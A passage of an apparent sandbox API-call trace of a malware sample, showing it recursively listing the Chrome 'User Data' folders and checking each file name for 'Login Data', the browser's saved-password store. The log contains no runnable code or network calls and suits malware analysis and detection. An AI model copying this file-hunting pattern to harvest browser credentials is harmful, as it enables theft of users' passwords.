returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0161.434] lstrlenW (lpString="Crashpad") returned 8 [0161.434] GetProcessHeap () returned 0x8e0000 [0161.434] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x925360 [0161.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.434] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0161.434] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.434] GetProcessHeap () returned 0x8e0000 [0161.434] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0161.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.434] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.434] lstrlenW (lpString="\\*.*") returned 4 [0161.434] GetProcessHeap () returned 0x8e0000 [0161.434] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa2) returned 0x925408 [0161.434] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0161.434] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*" [0161.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0161.435] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.435] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.435] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.435] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.435] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5beda0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="metadata", cAlternateFileName="")) returned 1 [0161.435] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.435] lstrlenW (lpString="\\") returned 1 [0161.435] GetProcessHeap () returned 0x8e0000 [0161.435] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0161.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0161.435] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.435] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0161.435] lstrlenW (lpString="metadata") returned 8 [0161.435] GetProcessHeap () returned 0x8e0000 [0161.435] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925560 [0161.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.435] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata" [0161.435] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.435] GetProcessHeap () returned 0x8e0000 [0161.435] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0161.435] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\metadata", lpSrch="Login Data") returned 0x0 [0161.435] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.435] GetProcessHeap () returned 0x8e0000 [0161.435] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0161.435] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="reports", cAlternateFileName="")) returned 1 [0161.435] lstrcmpiW (lpString1="reports", lpString2=".") returned 1 [0161.436] lstrcmpiW (lpString1="reports", lpString2="..") returned 1 [0161.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.436] lstrlenW (lpString="\\") returned 1 [0161.436] GetProcessHeap () returned 0x8e0000 [0161.436] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0161.436] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0161.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0161.436] lstrlenW (lpString="reports") returned 7 [0161.436] GetProcessHeap () returned 0x8e0000 [0161.436] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xaa) returned 0x925560 [0161.436] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" [0161.436] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.436] GetProcessHeap () returned 0x8e0000 [0161.436] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0161.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 84 [0161.436] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned 84 [0161.436] lstrlenW (lpString="\\*.*") returned 4 [0161.436] GetProcessHeap () returned 0x8e0000 [0161.436] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925618 [0161.436] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports" [0161.436] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*" [0161.436] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\reports\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.437] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.437] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.437] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.437] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.437] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f598c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0161.437] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.437] VirtualQuery (in: lpAddress=0x925618, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.437] GetProcessHeap () returned 0x8e0000 [0161.437] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925618 | out: hHeap=0x8e0000) returned 1 [0161.437] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.437] GetProcessHeap () returned 0x8e0000 [0161.437] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0161.437] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0161.437] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned 76 [0161.437] lstrlenW (lpString="\\") returned 1 [0161.437] GetProcessHeap () returned 0x8e0000 [0161.437] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9c) returned 0x9254b8 [0161.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad" [0161.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.437] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned 77 [0161.437] lstrlenW (lpString="settings.dat") returned 12 [0161.437] GetProcessHeap () returned 0x8e0000 [0161.437] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb4) returned 0x925560 [0161.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\" [0161.437] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\", lpString2="settings.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" [0161.437] VirtualQuery (in: lpAddress=0x9254b8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254b8 | out: hHeap=0x8e0000) returned 1 [0161.438] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat", lpSrch="Login Data") returned 0x0 [0161.438] VirtualQuery (in: lpAddress=0x925560, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925560 | out: hHeap=0x8e0000) returned 1 [0161.438] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f598c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3a6374a0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0161.438] FindClose (in: hFindFile=0x8f9ac0 | out: hFindFile=0x8f9ac0) returned 1 [0161.438] VirtualQuery (in: lpAddress=0x925408, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925408 | out: hHeap=0x8e0000) returned 1 [0161.438] VirtualQuery (in: lpAddress=0x925360, lpBuffer=0x2df58c, dwLength=0x1c | out: lpBuffer=0x2df58c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925360 | out: hHeap=0x8e0000) returned 1 [0161.438] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df5d0 | out: lpFindFileData=0x2df5d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0161.438] lstrcmpiW (lpString1="Default", lpString2=".") returned 1 [0161.438] lstrcmpiW (lpString1="Default", lpString2="..") returned 1 [0161.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned 67 [0161.438] lstrlenW (lpString="\\") returned 1 [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x8a) returned 0x9252c8 [0161.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data" [0161.438] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.438] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned 68 [0161.438] lstrlenW (lpString="Default") returned 7 [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x98) returned 0x925360 [0161.438] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\" [0161.438] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpString2="Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.438] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2df580, dwLength=0x1c | out: lpBuffer=0x2df580*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.438] GetProcessHeap () returned 0x8e0000 [0161.438] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0161.439] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.439] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.439] lstrlenW (lpString="\\*.*") returned 4 [0161.439] GetProcessHeap () returned 0x8e0000 [0161.439] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa0) returned 0x925400 [0161.439] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.439] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*" [0161.439] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*.*", lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0161.441] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.441] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, 